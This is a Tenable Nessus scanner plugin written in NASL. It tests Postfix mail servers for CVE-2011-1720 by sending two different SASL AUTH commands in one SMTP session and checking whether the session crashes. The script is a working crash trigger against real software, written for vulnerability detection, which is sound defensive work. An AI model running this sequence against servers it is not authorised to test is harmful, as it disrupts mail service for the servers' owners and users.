Postfix Cyrus SASL Authentication Context Data Reuse Memory Corruption (exploit)

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(54584);
  script_version("1.8");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_cve_id("CVE-2011-1720");
  script_bugtraq_id(47778);
  script_xref(name:"CERT", value:"727230");
  script_xref(name:"Secunia", value:"44500");

  script_name(english:"Postfix Cyrus SASL Authentication Context Data Reuse Memory Corruption (exploit)");
  script_summary(english:"Tries to crash SMTP session.");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote mail server is affected by a memory corruption
vulnerability."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The Postfix mail server listening on this port appears vulnerable to
a memory corruption attack as Nessus was able to crash an SMTP session
with this host by using two different authentication methods in one
session. 

Note that code execution as the unprivileged postfix user may also be
possible."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.postfix.org/CVE-2011-1720.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/bugtraq/2011/May/64"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Upgrade to Postfix 2.5.13 / 2.6.19 / 2.7.4 / 2.8.3 or later."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"vuln_publication_date", value:"2011/05/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/05/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/05/19");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:postfix:postfix");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"SMTP problems");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  script_dependencies("smtp_authentication.nasl");
  script_require_ports("Services/smtp", 25);
  script_require_keys("SMTP/postfix");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

port = get_service(svc:"smtp", default:25, exit_on_fail:TRUE);

function exploit(methods, port, starttls)
{
  local_var cmd, cmds, i, last, log, res, sock;

  # Connect to the service.
  sock = smtp_open(port:port);
  if (!sock) exit(1, "Failed to open socket on port " + port + ".");

  # Negotiate a StartTLS connection if supported.
  if (starttls)
  {
    sock = smtp_starttls(socket:sock, encaps:ENCAPS_TLSv1);
    if (!sock) exit(1, "StartTLS failed for socket on port " + port + ".");
  }

  # Initialize the SMTP session.
  send(socket:sock, data:'EHLO nessus\r\n');
  res = smtp_recv_line(socket:sock, code:250);
  if (isnull(res))
    exit(1, "The SMTP server on port " + port + " didn't respond to 'EHLO'.");

  # Send commands that should trigger a crash if vulnerable.
  log = make_list();
  cmds = make_list(
    "AUTH " + methods[0],
    "*",
    "AUTH " + methods[1]
  );

  for (i = 0; i < max_index(cmds); i++)
  {
    # Determine if this is the final iteration.
    last = (i == max_index(cmds) - 1);

    # Interact with the server.
    cmd = cmds[i];
    send(socket:sock, data:cmd + '\r\n');
    res = smtp_recv_line(socket:sock);
    if (isnull(res))
    {
      if (!last)
        exit(1, "The SMTP server on port "+port+" failed to respond to '" + cmd + "'.");
      res = "*CRASH*";
    }
    else if (last)
    {
      return NULL;
    }

    # Record the interaction.
    log = make_list(
      log,
      "C: " + cmd,
      "S: " + chomp(res)
    );
  }

  close(sock);

  return log;
}

# Make sure the banner says that this is a Postfix server. If we're
# being completely paranoid, ignore the banner and try the exploit
# anyways.
if (report_paranoia < 2)
{
  banner = chomp(get_smtp_banner(port:port));
  if (isnull(banner))
    exit(1, "Failed to retrieve the banner from the SMTP server listening on port " + port + ".");
  if ("Postfix" >!< banner)
    exit(0, "The banner from the SMTP server listening on port " + port + " is not from Postfix.");
}

# Determine whether to do this using an encrypted or an unencrypted
# channel.
log = NULL;
required_methods = FALSE;
foreach key (make_list("auth", "auth_tls"))
{
  # Get list of supported authentication methods.
  list = get_kb_list("smtp/" + port + "/" + key);
  if (isnull(list)) continue;

  # Remove unaffected methods. Sort the methods because CRAM-MD5 and
  # DIGEST-MD5 are the ones that trigger the issue most reliably.
  methods = make_list();
  foreach method (sort(list))
  {
    if (method == "ANONYMOUS" || method == "LOGIN" || method == "PLAIN")
      continue;
    methods = make_list(methods, method);
  }

  # Need at least two methods to perform the exploit.
  if (max_index(methods) < 2) continue;
  required_methods = TRUE;

  # Attempt to exploit the vulnerability.
  starttls = (key == "auth_tls");
  log = exploit(port:port, starttls:starttls, methods:methods);
  if (!isnull(log)) break;
}

if (isnull(log))
{
  if (required_methods) exit(0, "The Postfix server on port " + port + " does not appear to be affected.");
  else exit(1, "The Postfix server on port " + port + " does not support at least two affected authentication methods.");
}

if (report_verbosity > 0)
{
  report =
    '\nThe remote Postfix installation was exploited as follows : ' +
    '\n';
  foreach line (log)
    report += '  ' + line + '\n';
  security_warning(port:port, extra:report);
}
else security_warning(port);